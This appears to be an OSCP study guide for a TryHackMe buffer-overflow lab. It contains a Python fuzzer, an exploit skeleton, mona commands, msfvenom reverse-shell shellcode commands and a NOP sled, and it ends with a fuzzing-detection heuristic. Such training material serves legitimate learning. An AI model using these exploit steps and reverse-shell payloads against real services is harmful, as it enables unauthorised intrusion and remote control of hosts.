Buffer Overflow Methodology

Buffer Overflow Methodology for OSCP from TryHackMe Buffer Overflow Prep

1. Fuzz the application to find the number of bytes needed to crash it

fuzzer.py
import socket, sys, time

ip = "10.10.50.84"
port = 1337

timeout = 5
prefix = "OVERFLOW1 "

# Start with 100 bytes after the command prefix and grow by 100 bytes each round.
string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)  # banner
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)  # a timeout or reset here means the service stopped responding
  except OSError:
    # socket.timeout and the connection errors are all OSError subclasses in Python 3
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

2. Set mona configuration

!mona config -set workingfolder c:\mona\%p

3. Find EIP offset

exploit.py
import socket

ip = "10.10.50.84"
port = 1337

prefix = "OVERFLOW2 "  ## optional command prefix
eip_offset = 0         ## number of bytes needed to reach EIP (step 3)
overflow = "A" * eip_offset
retn = ""      ## jmp esp address, little-endian: 0x625011af becomes "\xaf\x11\x50\x62"
padding = ""   ## NOP sled (step 7)
payload = ""   ## shellcode from msfvenom (step 6)
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except OSError:
  print("Could not connect.")
finally:
  s.close()

4. Find bad characters

  • Generate byte array in mona: !mona bytearray -b "\x00"

  • Compare to find the bad character: !mona compare -f C:\mona\oscp\bytearray.bin -a

5. Find a jmp esp instruction whose address contains no bad characters

List the bad characters after the -cpb flag.

!mona jmp -r esp -cpb "\x00"

6. Generate shellcode

List the bad characters after the -b flag.

  • Windows - msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00" -f c

  • Linux - msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00" -f c

7. Set a NOP sled as the padding

padding = "\x90" * 24
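Seen from the defending side, the traffic these steps generate is easy to spot: a command prefix followed by a run of one repeated byte that grows by a fixed step on every connection, and later a 0x90 sled. The following detection heuristic is an added example, not part of the original methodology; it assumes the requests to the service have already been captured as raw bytes per source, and the thresholds and sample traffic are constructed for the example.

```python
from itertools import groupby

NOP_SLED = b"\x90" * 24   # sled size used in step 7
STEP = 100                # increment fuzzer.py adds each round (step 1)


def longest_run(data: bytes):
    """Return (byte_value, length) of the longest run of one repeated byte."""
    best = (None, 0)
    for value, grp in groupby(data):
        n = sum(1 for _ in grp)
        if n > best[1]:
            best = (value, n)
    return best


def classify(request: bytes, min_run: int = 100):
    """Flag one request: NOP sled present and/or a long single-byte run."""
    findings = []
    if NOP_SLED in request:
        findings.append("nop-sled")
    _, n = longest_run(request)
    if n >= min_run:
        findings.append(f"repeated-byte-run:{n}")
    return findings


def detect_fuzzing(requests, step: int = STEP, min_rounds: int = 3):
    """True when successive requests from one source carry a single-byte run
    that grows by a constant step, the signature of the incremental fuzzer."""
    runs = [longest_run(r)[1] for r in requests]
    diffs = [b - a for a, b in zip(runs, runs[1:])]
    return len(diffs) >= min_rounds - 1 and all(d == step for d in diffs)


# Constructed sample traffic (assumed capture format, not a real capture).
PREFIX = b"OVERFLOW1 "
FUZZ = [PREFIX + b"A" * (100 * i) for i in range(1, 6)]
BENIGN = [PREFIX + b"hello", PREFIX + b"status"]

if __name__ == "__main__":
    for r in FUZZ + BENIGN:
        print(r[:20], classify(r))
    print("fuzzing sequence:", detect_fuzzing(FUZZ), detect_fuzzing(BENIGN))
```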
